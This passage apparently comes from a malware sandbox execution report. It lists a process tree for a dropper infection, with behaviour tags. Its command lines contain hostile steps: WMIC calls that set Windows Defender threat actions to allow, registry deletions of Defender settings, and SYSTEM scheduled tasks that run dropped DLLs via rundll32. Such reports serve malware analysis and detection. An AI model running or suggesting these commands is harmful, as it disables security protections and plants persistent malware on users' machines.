                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:9528
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:19316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:11492
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:12796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  schtasks /DELETE /F /TN "bEwGusBEGbIeKSSfjR"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7744
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8804
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4964
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:10504
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\TdgVoScrU\wMaCDE.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "xSbgDCImQNdWYmB" /V1 /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:11260
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks /CREATE /TN "xSbgDCImQNdWYmB2" /F /xml "C:\Program Files (x86)\TdgVoScrU\rBozWuM.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6480
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            schtasks /END /TN "xSbgDCImQNdWYmB"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8848
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              schtasks /DELETE /F /TN "xSbgDCImQNdWYmB"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:10408
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                schtasks /CREATE /TN "FzvIgGdeRLcgbM" /F /xml "C:\Program Files (x86)\xmhVlMznYVRU2\qGspXwE.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:13328
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10608
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  schtasks /CREATE /TN "rRYXbmmYjIvrG2" /F /xml "C:\ProgramData\mrnDKDtAoCXFymVB\bXpZfqi.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:12112
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  schtasks /CREATE /TN "DVpMShOGhTVXDiVCZ2" /F /xml "C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR\pNKBWUu.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:13592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  schtasks /CREATE /TN "LdVsjAprHUXUOtSHAnG2" /F /xml "C:\Program Files (x86)\FAROrqqmwDJuC\MSPKFlJ.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8596
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  schtasks /CREATE /TN "spuMTubdtfoo" /SC once /ST 08:36:54 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\GebyjqhU\vuUZBai.exe\" RA /S"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:13932
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  schtasks /run /I /tn "spuMTubdtfoo"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:13288
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • \??\c:\windows\system32\rundll32.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\fIDQkgvqEeYuFUPy\XiOEFUDs\hZTBWZO.dll",#1 /site_id 668658
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8512
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      c:\windows\system32\rundll32.EXE "C:\Windows\Temp\fIDQkgvqEeYuFUPy\XiOEFUDs\hZTBWZO.dll",#1 /site_id 668658
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8960
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        schtasks /DELETE /F /TN "lDWDrPZYJQBuPmKYQ"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:13724
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\zGfATNLg\NYaOvet.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\zGfATNLg\NYaOvet.exe RA /S
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:12652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:18320
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\GebyjqhU\vuUZBai.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\GebyjqhU\vuUZBai.exe RA /S
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:11372
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:17960
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\aeghugg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\aeghugg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:16012
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\ctghugg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\ctghugg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:15960
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:988
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20bc9ea26f.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Thu20bc9ea26f.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2216
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2384
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1828
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3484
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5824
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4436
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7080
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4084
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6344
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 5FE56DEFAC11A73349E4383CF6185F62 C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6900
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding F21845CC647FC8DDA45ED6A9D3334C88
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6840
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9724
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding C02DE23DF62EEC4B34246EF20B9EB67B E Global\MSI0000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:60
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
